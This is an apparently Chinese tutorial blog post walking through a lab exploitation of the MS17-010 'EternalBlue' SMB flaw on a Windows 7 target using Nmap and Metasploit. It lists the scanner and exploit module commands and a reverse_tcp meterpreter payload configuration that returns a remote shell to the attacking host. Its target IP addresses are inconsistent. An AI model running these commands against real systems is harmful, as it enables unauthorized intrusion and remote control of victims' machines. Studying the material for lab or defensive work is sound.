网站首页 > 技术教程 正文
MS17-010远程溢出漏洞
实验工具
Nmap:端口扫描探测工具,用于探测端口开放情况,本次使用其端口扫描和漏洞扫描功能
mestasploit:开源的渗透测试框架软件、综合型漏洞利用工具,本次实验使用其漏洞利用模块、meterpreter组件
其实我们这里所说的使用MSF 实现 "永恒之蓝"的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。"永恒之蓝"的原理主要是扫描所有开放445文件共享端口的Windows机器。
445端口简介:
445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 2017年10月,由于病毒"坏兔子"来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。
准备:
Kali系统 版本:2.0 IP:192.168.1.180
Win7系统 IP:192.168.0.133 开放端口:445
实战攻击:
1.在终端输入msfconsole
2.漏洞模块路经查询
在终端输入:search ms17-010
加载扫描模块
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.0.143 (靶机的IP)
Exploit
加载攻击模块并配置参数
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhost 192.168.1.133 (靶机的IP)
set lhost 192.168.1.180 (发起攻击的主机IP)
set lport 443 (监听的端口)
反弹回一个meterpreter代表我们已经操控靶机
具体的提权操作在这里就不再介绍了
实验总结:
探测是否存在永恒之蓝漏洞:先用nmap等工具查看主机是否开放445端口,然后使用metaspliot的辅助模块查看是否存在永恒之蓝漏洞,如存在就可进一步攻击
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。(送免费资料和优惠券)
就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!
猜你喜欢
- 2025-04-07 永恒之蓝卷土重来 新一轮Petya勒索病毒横扫欧美
- 2025-04-07 业内分析:国内用户应警惕SMB远程代码执行漏洞
- 2025-04-07 关于防控“永恒之蓝”攻击程序发起的网络攻击事件的通知
- 2025-04-07 黑客游戏介绍-Hacknet(一款黑客游戏)
- 2025-04-07 Windows被指现史诗级漏洞 涉及Win 10
- 2025-04-07 电脑里的文件就是钱,腾讯一软件可做“金库保管员”
- 2025-04-07 Win7/Win10版《奇迹时代3:永恒领主》DLC发布
- 2025-04-07 Windows RDP服务蠕虫级漏洞预警 堪比WannaCry
- 2025-04-07 注意!每天数十万台Win7系统电脑因这一漏洞被攻击
- 2025-04-07 比"永恒之蓝"还恐怖的"永恒之黑"来了 注意以下版本的记得打补丁
你 发表评论:
欢迎- 04-07真爱和依赖的区别,你能分清吗?(真依赖是什么意思)
- 04-07爱与依赖的界限在哪里?你真的分得清吗?
- 04-07在关系中,你是“依赖”还是“反依赖”?
- 04-07#依赖(#依赖和移情的区别)
- 04-07自尊,自爱,自力,依赖别人不如依赖自己
- 04-07依赖:被爱的错觉,还是信任的升华?
- 04-07图说丨依赖(依赖dj)
- 04-07草堂读诗|朗诵:毛子《依赖之诗》《矛盾律》
- 最近发表
- 标签列表
-
- sd分区 (65)
- raid5数据恢复 (81)
- 地址转换 (73)
- 手机存储卡根目录 (55)
- tcp端口 (74)
- project server (59)
- 双击ctrl (55)
- 鼠标 单击变双击 (67)
- debugview (59)
- 字符动画 (65)
- flushdns (57)
- ps复制快捷键 (57)
- 清除系统垃圾代码 (58)
- web服务器的架设 (67)
- 16进制转换 (69)
- xclient (55)
- ps源文件 (67)
- filezilla server (59)
- 句柄无效 (56)
- word页眉页脚设置 (59)
- ansys实例 (56)
- 6 1 3固件 (59)
- sqlserver2000挂起 (59)
- vm虚拟主机 (55)
- config (61)
本文暂时没有评论,来添加一个吧(●'◡'●)